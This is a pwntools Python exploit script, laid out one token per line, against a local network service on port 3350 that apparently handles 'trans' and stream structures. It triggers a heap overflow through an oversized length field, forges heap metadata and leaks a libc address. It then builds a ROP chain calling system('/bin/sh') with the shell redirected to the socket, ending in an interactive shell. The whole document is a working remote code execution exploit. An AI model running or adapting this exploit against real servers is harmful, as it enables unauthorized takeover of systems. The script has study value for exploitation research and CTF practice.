from
pwn
import
*
context.arch
=
'amd64'
context.log_level
=
'debug'
context.encoding
=
'latin-1'
p
=
remote(
"127.0.0.1"
,
3350
)
conns
=
[
0
for
i
in
range
(
16
)]
for
i
in
range
(
10
):
conns[i]
=
remote(
"127.0.0.1"
,
3350
)
print
(
"prepare to send version and size"
)
pause()
p.send(p32(
0
))
p.send(p32(
0x80000000
, endian
=
'big'
))
print
(
"prepare to close 7 conns"
)
pause()
for
i
in
range
(
7
):
conns[i
+
1
].close()
print
(
"prepare to overflow"
)
pause()
p.send(b
"\x00"
*
0x2000
+
p64(
0xb1
)
+
b
"\x00"
*
0xa8
+
p64(
0x2b1
)
+
p64(
0x8
)
+
p32(
0x1
)
+
p32(
0x1
)
+
p64(
0x2
)
+
p64(
0x407880
))
print
(
"prepare to close conns[0]"
)
pause()
conns[
0
].close()
print
(
"mov pointer"
)
pause()
p.send(b
"\x00"
*
0x280
)
print
(
"prepare to retrive the trans and in_s back"
)
pause()
conns[
11
]
=
remote(
"127.0.0.1"
,
3350
)
print
(
"overflow conns[11]"
)
conns[
11
].send(p32(
0
))
conns[
11
].send(p32(
0x80000000
, endian
=
'big'
))
print
(
"prepare to fake in_s"
)
pause()
p.send(p64(
0
)
+
p64(
0x71
)
+
p64(
0x410c00
)
+
p64(
0x410c00
)
+
p64(
0x410bf8
))
print
(
"prepare to fake another in_s and wait_s"
)
pause()
fake_in_s
=
flat([
0x410d80
,
0x410d80
,
0x410d80
,
0x2000
]
+
[
0
]
*
8
)
fake_wait_s
=
flat([
0
,
0x101
,
0x410000
,
0x4104F8
,
0
]).ljust(
0x100
, b
'\x00'
)
+
p64(
0
)
+
p64(
0x11
)
+
p64(
0
)
+
p64(
0x11
)
conns[
11
].send(fake_in_s
+
fake_wait_s)
print
(
"prepare to close p"
)
pause()
p.close()
print
(
"prepare to create p"
)
pause()
p
=
remote(
"127.0.0.1"
,
3350
)
p.send(p32(
0x2222CCCC
))
p.send(p32(
0x80000000
, endian
=
'big'
))
print
(
"prepare to create conns[12], and p's trans->in_s->end will just locate above conns[12]'s trans strucure"
)
pause()
conns[
12
]
=
remote(
"127.0.0.1"
,
3350
)
conns[
12
].send(p32(
0x2222CCCC
))
conns[
12
].send(p32(
0x80000000
, endian
=
'big'
))
print
(
"prepare to hijack in_s and wait_s"
)
pause()
payload
=
b
"\x00"
*
0x2000
+
p64(
0x2b1
)
+
p64(
0x9
)
+
p32(
1
)
+
p32(
1
)
+
p64(
0x2
)
+
p64(
0x0000000000407880
)
+
p64(
0
)
+
p64(
0xdeadbeef
)
+
p64(
0x410d80
)
+
p64(
0x410c00
)
+
p64(
0
)
+
p64(
0
)
*
2
+
p64(
0x410c70
)
p.send(payload)
print
(
"prepare to leak"
)
pause()
conns[
12
].recvn(
0x148
)
libc_base
=
u64(conns[
12
].recvn(
0x8
))
-
0xa5120
print
(
"prepare rop chain"
)
pause()
mov_rsp_rdx
=
libc_base
+
0x000000000005a170
pop_rdi
=
libc_base
+
0x000000000002a3e5
pop_rsi
=
libc_base
+
0x000000000002be51
pop_rdx
=
libc_base
+
0x000000000011f497
pop_rax
=
libc_base
+
0x0000000000045eb0
syscall_ret
=
libc_base
+
0x0000000000091396
system
=
libc_base
+
0x00000000050d60
ropchain
=
flat([pop_rdi,
0x410e80
, system])
ropchain
=
ropchain.ljust(
0x100
, b
'\x00'
)
ropchain
+
=
b
'/bin/sh 1>&7 0>&7'
conns[
11
].send(ropchain)
print
(
"hijack conns[12]'s trans_recv"
)
pause()
payload
=
b
'\x00'
*
0x220
+
p64(mov_rsp_rdx)
p.send(payload)
print
(
"getshell"
)
pause()
conns[
12
].send(b
'\x00'
)
success(
"libc_base: %s"
%
hex
(libc_base))
p.interactive()